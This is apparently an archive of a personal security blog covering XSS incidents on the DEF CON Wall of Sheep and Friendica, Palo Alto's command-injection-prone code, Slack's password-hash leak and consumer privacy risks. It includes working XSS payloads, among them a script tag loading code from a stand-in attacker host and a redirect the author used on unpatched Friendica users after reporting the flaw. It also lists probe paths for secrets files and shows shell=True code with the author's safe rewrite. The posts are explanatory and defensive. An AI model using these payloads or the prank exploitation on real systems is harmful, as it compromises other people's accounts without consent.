infosec
- Defending your AI assets
- Defending your assets from AI
- Defending your assets with AI
- Prompt injection for lolz and cash
- Lacks end-to-end encryption
- An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
- The attack was simple: I changed my username to a bit of valid JavaScript.
- All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
- My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
- The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
- Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people.
- Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm.
- If you’re connected to the right Wi-Fi network and submit credentials in plaintext, they’ll be shown on the wall.
- The process of getting captured credentials on the wall is automated.
- The wall is rendered by a web browser.
- The wall’s software has been around for a while and wasn’t written to be particularly secure. After all, it’s on the attacking end, right?
- No one’s tried this before, so no one’s fixed it before.
- Username: Me<script ...
- Password: lol
- Setting this up in advance. Again, Vim over SSH on a phone sucks. I’ll have the fake login working before I leave home.
- Getting there earlier. If the Wall of Sheep is ever going to be automated and rendered in a browser, it’ll be at the opening of DEF CON before anyone’s polluted the waters.
- Using a more common authentication method than HTTP Basic auth, like a typical login form.
- Making the resulting page look like I’d really logged into a legitimate service.
- Bringing a burner device, because putting my own personal device on that specific Wi-Fi network was not the best idea I’ve ever had.
- I didn’t get anyone’s names, or their permission to describe them. Fake names are all you get.
- I appreciate the irony that I’m complaining about hackers getting stuff to show up on the Wall of Sheep in a post where I’m talking about getting stuff to show up on the Wall of Sheep. The first rule of a good prank, though, is “don’t be a jackass and ruin it for everyone else”. I was going for something that I hoped the Shepherds would find amusing and wasn’t trying to get racial slurs and other vile junk to show up on a big screen. Don’t be that person.
- How can you have a major vulnerability like this for 5 years?
- What hashing algorithm did they use? Argon2? MD5?
- Did they use per-user salts or one global one?
- Where is the open, public notification of the issue?
- However good and strong your WiFi password is, if an attacker can access your neighbor’s network, they can hack your neighbor’s Alexa and then use it to gain access to your own wireless network.
- A braver attacker could sit outside your house with a hacked Alexa, or an app on their laptop that acts like one, and use it to connect to your Ring doorbell and then attack the other computers on your network.
The coffee shop is fine
I hear too many acquaintances worry that employees might work from a coffee shop or other public network, putting their whole company at risk. So what if they do? The idea that a coffee shop’s Wi-Fi is insecure implies that there’s a mythical “secure” network that can be trusted with the company’s secrets. That’s almost never true.
Work-from-home employees are on a tame home Wi-Fi setup, right? Don’t count on it. Is their gear current? Are they sharing Wi-Fi with their neighbors? Are they using their apartment building’s network? Who’s their ISP? Although their home setup might – or might not – have fewer people on it than the local cafe’s, that doesn’t make it trustworthy.
What about the employees we coerced into returning to a legacy office and using its Wi-Fi? Oh. You mean that named network that sits around with a target on its back as belonging to important people? Unless you manage your own office, and it’s in a Faraday cage blocking all outbound or inbound radio signals, and you pretend that MAC filtering is a security feature, and all your equipment is patched with the latest security updates, and you have guards walking around with fox hunt antennas to spot rogue access points, it’s not substantially better in the ways that count. If you can read this at work, at least a few of those assumptions are likely wrong.
The idea of a “trusted network” is dead. It’s time we stop pretending. If an employee can be compromised at the coffee shop, they can be compromised at the office. We have to design our defenses as though our staff are working from the free network at DEF CON. That means making sure all employee devices and servers are patched. That all connections are encrypted, even those between internal systems. That authentication uses cryptography, not passwords. That we don’t pretend that “route all traffic” VPNs are a good idea. That we don’t rely on allowlisted IPs as a critical defense. That we don’t trust any network our employees might use, and that our systems are robust enough to endure hostile environments. Yes, even the ones we tell ourselves are safe.
And if we’re not comfortable with our coworkers typing away next to a fresh latte, it’s our responsibility to figure out what part of that bothers us and then fix it. The issues that would make that scenario dangerous affect the “secure” office, too.
The email: Click here to enhance your account’s security with two-factor authentication!
Click.
The website: Please enter your phone number to receive your access code.
Cmd-W.
When a coworker forwards you an email to ask if it looks like phishing, take a moment to publicly praise them for it. “Jane sent me an example of a new phishing campaign going around. Her instinct to let us know about it was exactly right. Thanks, Jane!” Reinforce the idea that Security has their back and will be pleasant to interact with. That’s how you get them to want to report things.
Polyfill supply chain attack hits 100K+ sites:
The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io.
This is fine.
This is interesting and dangerous. I’m trying the new macOS Sequoia Passwords app. I exported my passwords from 1Password to a CSV and imported them into the new app, then soon saw a bunch of ancient logins from old employers. What? Searching for them in 1Password found nothing.
Oh, turns out those are archived in 1Password. The normal cmd-F search doesn’t look in Archive even if you’ve selected it. The other opt-cmd-F find does.
Hope you remembered to delete the passwords that would get you beaten up.
Little Snitch 6 came out yesterday with many quality of life improvements.
It’s always the first app I install on a new Mac. New versions are no-brainer upgrades for me. I still wish it had a way to sync rulesets between Macs so that I don’t have to train each one independently.
I am not exaggerating this:
I created a new hostname in DNS, then added it to my existing webserver config.
It was online for 3 seconds – 3! – before getting a 404 request for /.git/config.
If you’re relying on obscurity to protect your services, get that right out of your fool head today. You have about 3 seconds to get your act together.
In the time it took me to type this, I got another 62 requests:
30 "/"
3 "/.git/config"
2 "/.vscode/sftp.json"
2 "/v2/_catalog"
2 "/telescope/requests"
2 "/server-status"
2 "/server"
2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
2 "/?rest_route=/wp/v2/users/"
2 "/login.action"
2 "/.env"
2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
2 "/.DS_Store"
2 "/debug/default/view?panel=config"
2 "/config.json"
2 "/_all_dbs"
2 "/about"
You know how sometimes you come to decide that an entire niche market is so filled with awful and overpriced alternatives that you’d rather just write your own and give it away for free?
My toes are on the precipice.
Conference tracks where more than a few people are wearing khaki:
Additional conference tracks where more than a few people have primary colored hair:
Palo Alto's exploited Python code
watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.
The awfulness of Palo Alto’s Python code in this snippet stood out to me:
def some_function():
    ...
    if source_ip_str is not None and source_ip_str != "":
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
            %(signedUrl, fname, capath, source_ip_str)
    else:
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
            %(signedUrl, fname, capath)
    if dbg:
        logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
    stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
    ...

def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
    """call shell-command and either return its output or kill it
    if it doesn't normally exit within timeout seconds"""
    # Define dosys specific constants here
    PANSYS_POST_SIGKILL_RETRY_COUNT = 5
    # how long to pause between poll-readline-readline cycles
    PANSYS_DOSYS_PAUSE = 0.1
    # Use first_wait if time to complete is lengthy and can be estimated
    if first_wait == None:
        first_wait = PANSYS_DOSYS_PAUSE
    # restrict the maximum possible dosys timeout
    PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
    # Can support upto 2GB per stream
    out = StringIO()
    err = StringIO()
    try:
        if shell:
            cmd = command
        else:
            cmd = command.split()
    except AttributeError: cmd = command
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                         stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
    timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
It uses string building to create a curl command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True). What? No! Don’t ever do that!
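For contrast, here’s a minimal sketch of how that upload could avoid the shell entirely: build the command as an argument list and hand it to subprocess without shell=True. (The function and variable names below are my own, not Palo Alto’s.)

```python
import subprocess

def build_curl_cmd(signed_url, fname, capath, source_ip=None):
    # Build the upload command as an argv list instead of one big string.
    cmd = [
        "/usr/bin/curl", "-v",
        "-H", "Content-Type: application/octet-stream",
        "-X", "PUT", signed_url,
        "--data-binary", "@" + fname,
        "--capath", capath,
    ]
    if source_ip:
        cmd += ["--interface", source_ip]
    return cmd

# With shell=False (the default), each element is passed to curl as-is.
# A hostile value like '"; rm -rf / #' is an inert argument, not code:
cmd = build_curl_cmd("https://example.com/put", "f.bin", "/etc/ssl", '"; rm -rf / #')
# subprocess.run(cmd, timeout=250)  # execs curl directly; no shell involved
```

Because there’s no shell between Python and curl, there’s nothing for an attacker-controlled string to break out of.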
I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:
ᐅ bandit pan.py
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.12.1
Run started:2024-04-16 17:14:52.240258
Test results:
>> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
Severity: Medium Confidence: Low
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
Location: ./pan.py:14:26
13 logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
14 stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
15
--------------------------------------------------
>> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
Severity: High Confidence: High
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
Location: ./pan.py:49:8
48 bufsize=1,
49 shell=shell,
50 stderr=subprocess.PIPE,
51 close_fds=close_fds,
52 universal_newlines=True,
53 )
54 timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
--------------------------------------------------
Code scanned:
Total lines of code: 41
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 1
High: 1
Total issues (by confidence):
Undefined: 0
Low: 1
Medium: 0
High: 1
Files skipped (0):
From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.
Veilid in The Washington Post
I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:
Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.
You bet I’m letting this go to my head.
At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”
At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.”
But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.
I use Things without encryption
Update 2023-11-03: No, I don’t.
I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:
I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:
I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.
I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)
Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.
Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.
While I don’t like that Things lacks E2EE, the lack isn’t important enough, given how I want to use it, to keep me away. There are more secure alternatives like OmniFocus and Reminders, but the benefits I get from Things over those options make it worthwhile for me to hold my nose and use it.
Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.
But I know I should still look for something more secure.
Accidentally Hacking the Planet
Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:
<script type="text/javascript">alert("I was here.");</script>
Because I’m kind of a smartass, I later changed my Mastodon username to something similar:
<script>alert("Tek");</script>
Then I laughed about it with my geeky friends and promptly forgot all about the joke.
And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.
<script src="https://hackerz.ru/badstuff.js">Hi</script>
That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.
The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2
My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:
<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.
I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.
To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week later, the team published a new release so that all other Friendica admins could patch their systems.
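The fix for this whole class of bug is output encoding: escape user-controlled text before embedding it in a page. A minimal sketch in Python (Friendica itself is PHP; this only shows the principle):

```python
from html import escape

username = '<script>alert("Tek");</script>'

# Inserted raw into a page, the browser executes this as code.
# Escaped, the browser displays it as harmless literal text instead.
print(escape(username))  # &lt;script&gt;alert(&quot;Tek&quot;);&lt;/script&gt;
```

Every templating system worth using does this by default; the bugs come from the code paths that forget to.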
It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.
The Internet is a rough neighborhood
This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.
Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.
“I run my service on a custom port!” Doesn’t matter.
“I use IPv6!” Doesn’t matter.
“I’m just a nobody!” Doesn’t matter.
Practice safer networking, every time, all the time.
Trying (and Failing) to hack the Wall of Sheep
The Wall of Sheep is a popular exhibit at DEF CON. Participants run packet sniffers on an insecure Wi-Fi network and try to catch people logging into unencrypted websites and other services. If they see that happening, they post the person’s username and password on a giant display. It looks something like:
That’s an excellent reminder to be careful when you’re connected to an unknown network, and not to send your login credentials out in the open.
From the first time I saw it, though, I had to wonder: is the wall itself hackable? Could I make it look like this instead?
The idea kept bouncing around the back of my mind until I added it to my to-do list so I could stop thinking about it. I had to at least try it.
Assumptions
I know nothing about the Wall of Sheep’s internal workings. That’s deliberate. I wanted to test this for the fun of it, and part of the challenge was to see how far I could get without any knowledge of it. I had to make a few assumptions:
Choosing the attack
If the above assumptions are true, the obvious attack vector is Cross Site Scripting (XSS). The method is to create a snippet of JavaScript and then trick the Wall of Sheep into displaying — and executing — it. This should work:
<script type="text/javascript">alert("I was here.");</script>
But how do I get that onto the board? The password field is usually censored, such as hunter2 being masked to hunt***. That would destroy the payload, so that wouldn’t work. Is there a way to make a DNS hostname that renders correctly? Eh, maybe, but crafting that sounds like work. (Note to self: but boy, wouldn’t that wreak havoc on the web? Huh. I’ve gotta look into that.)
However, look at that lovely login field. It’s just sitting out there in full, uncensored, plaintext glory. Jackpot! That’s where I’ll inject the JavaScript.
Setting up a webserver
This attack requires a webserver to send those faked credentials to. For ease of implementation, I configured HTTP Basic authentication with:
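Basic auth is ideal for this because the credentials cross the wire merely base64-encoded, not encrypted, so any sniffer can read them right back out. A quick illustration with placeholder credentials (not the username I actually used):

```python
import base64

user, password = "sheep", "lol"

# The browser sends: Authorization: Basic base64("user:password")
header = "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()
print(header)  # Basic c2hlZXA6bG9s

# Anyone capturing the packets reverses it trivially:
print(base64.b64decode(header.split()[1]).decode())  # sheep:lol
```

That’s the whole “encryption”: encoding, not secrecy. It’s exactly why the Wall of Sheep works.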
Getting onto the DefCon-open Wi-Fi
You brought a burner device, right? I didn’t. What could possibly go wrong connecting an off-the-shelf device to an open network at DEF CON! YOLO.
Visiting the web page
I logged into the page on my webserver’s bare IP address, watched the board, and… nothing. I reloaded it; nothing. I looked around to see if any of the participants looked like they might’ve found something; still nothing. Rats.
Enlisting help
Jan and Pat1 were participants sitting near where I was setting this up. I needed their assistance but didn’t want to outright ask for it. I started posing innocent questions to Jan: “Hey, what are you working on? What’s Wireshark?” While they kindly explained in general terms, they were understandably more interested in their own project than tutoring a passerby. Pat was more willing to teach me and I pulled up a chair to sit with them. They patiently answered my questions and pointed to interesting things on their screen. They also noticed fairly quickly that I was regularly reloading a page on my phone as I watched them. “Hey, uh, are you trying to get caught?” “Maaaaybe…” “Why?” I gave them a quick explanation of my project and they instantly bought in:
Pat: Do you think this’ll work?
Me: Probably not, but it’s worth a shot.
Pat: Oh, wow. If it does, this will be legendary!
I had a helper. Soon after, Jan noticed we were up to something, leading to one of my favorite exchanges at DEF CON:
Jan: Are you two trying to get something up there on the board?
Me, grinning: Yeah. It’s a JavaScript injection.
Jan, wide-eyed: Who the hell are you?
Thank you, Jan. I felt like a bona fide Security Researcher after that.
Another random visitor saw us huddled and asked if we were trying to hack something. Jan looked at me, looked at the visitor, said “nope”, and looked back at me. I winked at Jan. Jan nodded back. The visitor squinted at us and walked off. Jan had my back.
Social engineering a Shepherd
After experimentation, we had usable Wireshark captures of me logging into my website. However, they weren’t being displayed on the Wall of Sheep. It turned out that my assumption was wrong: we had to demonstrate the capture to a “Shepherd” running the contest. Pat called one over. We showed them Pat’s capture, but they weren’t convinced at first. Most website logins are through a form POSTed to the server, not through HTTP Basic authentication. The Shepherd was also skeptical that the login was successful because the server was returning the default “welcome to Nginx!” page and not something personalized for the (obviously fake) username. I leaned very hard into the “innocent observer” role, asking questions like “but isn’t that what a successful capture looks like?” and “golly gee, it looks right to me. Don’t you think?” and “it looks suspicious to me, too, but couldn’t we try it and see what happens?” Our Shepherd seemed almost ready to go along with it — until they burned my plan to the ground.
Defeat
I asked the Shepherd how a login goes from being captured to being shown on the Wall of Sheep. Their reply doomed our fun: “I’d type it in.” Oh no. That’s not good. “Isn’t it automatic?”, I asked. The Shepherd paused to rub the bridge of their nose. “Well,” they sighed, “it was until people started sending a bunch of vile usernames and passwords and kind of ruined it2, so now we have to moderate the process.” I wasn’t giving up, though. “Could you type that username to see what happens?” “It’d just show up like that,” they replied. “Could we try it?”, I pleaded. “I mean, it’s just text. Um, that’s not a web page”, they countered.
What.
And then for the first time ever, I saw a flashing cursor down in the bottom corner of the Wall of Sheep. My heart sank. “Is that Excel or something?” They grinned: “it’s just some old software we run.”
Disaster.
Regrouping
That’s when I formally gave up on this attempt. If it were ever possible to hack the Wall of Sheep, it wasn’t on that day. That doesn’t mean I’m abandoning this forever, though. Next year, I’m going to make a smarter effort, by:
And if Jan and Pat are around, I’m recruiting their help again.
Slack was broadcasting hashed passwords for 5 years
I received an email from Slack on Thursday, 2022-08-04:
We’re writing to let you know about a bug we recently discovered and fixed in Slack’s Shared Invite Link functionality. This feature allows users with the proper permissions to create a link that will allow anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because one or more members of your workspace created and/or revoked one of these links for your workspace between April 17th, 2017 and July 17th, 2022. We’ll go into detail about this security issue below.
Important things first, though: We have no reason to believe that anyone was able to obtain plaintext passwords for users in your workspace because of this vulnerability. However, for the sake of caution, we have reset impacted users’ Slack passwords. They will need to set a new Slack password before they can login again. A list of impacted users is below.
[redacted]
Now, for some technical details — feel free to skip the next two paragraphs if that doesn’t interest you. When you’re connected to Slack, we keep your client updated using a piece of technology called a websocket. This is an always-open stream of behind-the-scenes information, specific to just you and your account, that we use to push new information to your Slack client. When a new message is posted, a new file is uploaded, a new emoji reaction is added, or a new teammate joins, all of this information (plus much more!) is sent to you over a websocket. Data streamed from Slack’s servers over the websocket is processed by the Slack client apps, but often hidden from the user’s view.
One of the hidden events we send over the websocket is a notice that a shared invite link was created or revoked. The bug we discovered was in this invite link event: along with the information about the shared invite link, we included the hashed password of the user who created or revoked the link. This information was sent over the websocket to all users of the workspace who were currently connected to Slack. The hash of a password is not the same as the password itself; it is a cryptographic technique to store data in a way that is secure, but not reversible. In other words, it is practically infeasible for your password to be derived from the hash, and no one can use the hash to log in as you. We use a technique called salting to further protect these hashes. Hashed passwords are secure, but not perfect — they are still subject to being reversed via brute force — which is why we’ve chosen to reset the passwords of everyone affected.
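Slack’s notice doesn’t say which algorithm or salting scheme they used, so for reference, here’s a sketch of what good practice looks like: a fresh random per-user salt plus a deliberately slow key-derivation function, using only Python’s standard library.

```python
import hashlib
import secrets

def hash_password(password: str) -> tuple[bytes, bytes]:
    # A random salt per user means identical passwords hash differently
    # and precomputed (rainbow table) attacks are useless.
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def check_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return secrets.compare_digest(candidate, digest)

salt, digest = hash_password("hunter2")
print(check_password("hunter2", salt, digest))  # True
print(check_password("hunter3", salt, digest))  # False
```

The hundreds of thousands of PBKDF2 iterations are the point: they make each brute-force guess expensive. A fast hash like plain MD5 or SHA-256, or a single global salt, would make leaked hashes far more crackable.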
When your users reset their passwords we recommend selecting a complex and unique password. This is easiest to do by using a password manager to help generate and store strong, unique passwords for every service.
If you have additional questions, or if you need our help as you investigate this issue, you can reply to this message or email us feedback@slack.com.
We know that the security of your data is important. We deeply regret this issue and its impact on your organization.
Sincerely, The team at Slack
In summary: for 5 years, every time someone created (or revoked) a shared invite link, Slack broadcast that person’s hashed password to every connected member of their workspace.
This email leaves a few questions unanswered:
However, they did get one thing right: use a password manager to generate a strong, random password for every single service you use, and never, ever, under any circumstances, use the same password for more than one service. Because if you’ve invited anyone to Slack in the last 5 years, and you use the same password for Slack and your bank, I hope you’re on friendly terms with all of your coworkers.
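There’s no magic to what a password manager generates, either. A sketch of the same idea with Python’s secrets module:

```python
import secrets
import string

def random_password(length: int = 24) -> str:
    # Cryptographically secure random choice from letters, digits,
    # and punctuation -- a unique password per service, never reused.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(random_password())
```

A different output every call, which is exactly the property you want: a leak of one service’s password (hashed or not) tells an attacker nothing about any other account.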
Update 2022-08-06
Slack has now posted about this on their blog.
Do not use Readdle's Spark email app
I’ve written before about Readdle’s Spark email client, which is popular, highly rated, and a beautifully powerful app. It’s also too dangerous to use. I recommend dropping it immediately.
Readdle is a good, reputable company. I respect and appreciate them. However, Spark’s design is fatally flawed: to use its advanced features, your email username and password (or token — same thing) have to be stored on their servers so that they can access your email account on your behalf. That’s bad under normal circumstances, but astoundingly risky today. Readdle was founded in Ukraine and still has many Ukrainian employees. Russia is currently invading Ukraine, a sovereign country. If Russia succeeds and takes control of Readdle’s people and infrastructure there, it could likely have access to the login credentials of every one of Spark’s users. This would be catastrophic. Imagine Russia’s security agencies having full access to your work account, being able to use your personal email to reset your banking website’s password, or reading every email you’ve ever sent or received.
Spark isn’t the only email app designed this way. I believe it’s the most popular, though, and that means its dangerous-by-design architecture is used by a lot of people. This isn’t acceptable and it can’t be fixed. If you use Spark, I strongly recommend following their instructions to delete all your data off their servers immediately, and then changing the password of every account you’d used it with.
And when you’re done, see if their other apps look interesting to you. Risks with Spark aside, Readdle makes delightful software and could use our support right now.
Uniquely bad identity branding
My company has an account with a certain identity provider so we can test that our single sign-on feature works. Today one of my coworkers asked for an account with the IdP before he started working on that part of our code. I tried to create his user but got an error that the “username must be unique”. Huh. I double-checked our user list to ensure we didn’t have an account for him. We didn’t. I tried again and got the same error. That’s when I reached out to their support. They quickly replied:
To resolve this issue, please navigate to Administration > Settings > Branding and toggle the custom branding switch to green. Then try to create a user and it should allow you!
What. This had nothing to do with branding, and the switch in question looks like this:
But alright, I figured I’d try their suggestion.
It worked.
I supposed what likely happened was that support had quickly found and fixed an issue, then gave me a switch to flip to make it feel like I was fixing something. I replied to them:
So we couldn’t add that user (but could add other users) because we didn’t have custom branding enabled? That can’t be right.
Their response?
It could be possible that the same username could exist in another customer’s tenant. So, once you enable the custom branding it would only look for your tenant for a unique username. With branding currently being disabled, the system is considering all tenants.
In short, if you click a logo to use your own theme for their site, usernames only have to be unique within your organization. If you don’t customize the site’s theme, they have to be unique across the whole identity provider. Furthermore, that uniqueness check only happens when you create a new user. If you flip the branding/namespace switch on, create an account, then flip the switch back off, the account is still active and usable even though it’s not globally unique. Even if you think that tying branding to uniqueness is a good idea — and it’s not — it doesn’t even work.
That whole setup is nuts.
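The logic their support described amounts to something like this. This is a minimal sketch of my own, not the IdP’s actual code; every class and method name here is invented for illustration:

```python
# Toy model of the uniqueness rule the IdP's support described.
# All names are hypothetical; this only illustrates the logic.

class IdentityProvider:
    def __init__(self):
        self.users = set()   # {(tenant, username)} across every customer
        self.branding = {}   # tenant -> custom branding enabled?

    def set_custom_branding(self, tenant, enabled):
        self.branding[tenant] = enabled

    def create_user(self, tenant, username):
        if self.branding.get(tenant, False):
            # Branding on: uniqueness is checked within this tenant only.
            taken = (tenant, username) in self.users
        else:
            # Branding off: the username must be unique across ALL tenants.
            taken = any(u == username for _, u in self.users)
        if taken:
            raise ValueError("username must be unique")
        # The check only runs at creation time, so flipping branding back
        # off afterward leaves a non-globally-unique account in place.
        self.users.add((tenant, username))


if __name__ == "__main__":
    idp = IdentityProvider()
    idp.create_user("other-customer", "alice")  # someone else's tenant
    try:
        idp.create_user("us", "alice")          # fails while branding is off
    except ValueError as e:
        print(e)                                # prints "username must be unique"
    idp.set_custom_branding("us", True)
    idp.create_user("us", "alice")              # now succeeds
```

Note how the model reproduces the second absurdity too: because the check happens only at creation, you can enable branding, create the duplicate, disable branding again, and the account survives.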
Tripping on a Cracked Sidewalk
Amazon Sidewalk is a new project which allows Amazon devices (like Alexa, Ring doorbells, etc.) with different owners to share their Internet connections. In short, your Alexa talks to your neighbor’s Alexa. If your Internet connection goes down, your neighbor’s device will relay messages for your device so that it can keep working. Similarly, if your Ring doorbell is closer to your neighbor’s Alexa than to your own WiFi router, it can send alerts to you through their Alexa.
This is a terrible idea.
This means that a device on your home network, a device you bought and paid for yourself, is letting other devices you don’t control borrow your Internet connection. Amazon claims to have designed this as a secure system, but people in infosec know that a new security protocol written and implemented by a single company is going to be a mess. When (not if, but when) an attacker finds a flaw in the Sidewalk protocol or the devices it runs on, terrible scenarios become likely.
If you have any Amazon devices, I strongly recommend you follow their instructions to turn off Sidewalk immediately. Because Amazon plans to turn this on for everyone who hasn’t explicitly asked them not to, if you don’t follow those instructions, you’ll be allowing people near your home to use your WiFi. Some owners have claimed that they turned off Sidewalk but that it turned itself back on after a software update. If this happens in my home, I will literally throw our Alexas out in the trash.
Amazon Sidewalk is a solution without a problem. Turn it off. This is a potential disaster in the making.
Security training for the masses
My company is going through its annual HIPAA privacy and security refresher training. This is a good thing and I wholeheartedly support it, as it’s always nice to be reminded of some of the details. “Oh, I forgot that we’re allowed to do X! That’s good to know.”
But the most irksome thing in the world is when you know the right answer to a test question but are required to give the wrong one to pass it. For instance, we were asked:
If you then connect with a VPN, will that ensure a file sent via email will be secure all the way through to its destination? Yes / No / Maybe
Test says: maybe! If you change nothing about your setup except adding a VPN into the mix, you may now be able to send email securely.
I say: The correct answer is “of course not”. Our company uses a “split tunnel” VPN, so only connections to certain services go over the VPN while the rest of our traffic goes over the open Internet. (Do we need to route someone’s after-hours Netflix viewing through an encrypted connection? No thank you.) But even without that, once you hand an email off to your own server, you have no control over what happens next. Does the recipient’s server support TLS connections? Are emails stored on that server encrypted at rest? Does their email app require TLS? Who knows! You sure won’t. So no, a VPN absolutely does not guarantee an email will be secure all the way through to its destination.
If you encrypt the file you are emailing, will that ensure a file sent via email will be secure all the way through to its destination?
Test says: yes! If you encrypt an email to an employee at another company, it’s guaranteed to be secure.
I say: Maybe, sure. I’d even go so far as to say it probably will. However, for all I know the recipient’s company uses some key escrow thing that lets them decrypt and analyze all inbound mail, and Joe from IT occasionally sells the interesting ones to North Korea.
Thing is, our particular training program is for the most part pretty decent, as far as such things go. Again, I’m glad we’re doing it. I just wish their post-training exams were a little more carefully worded.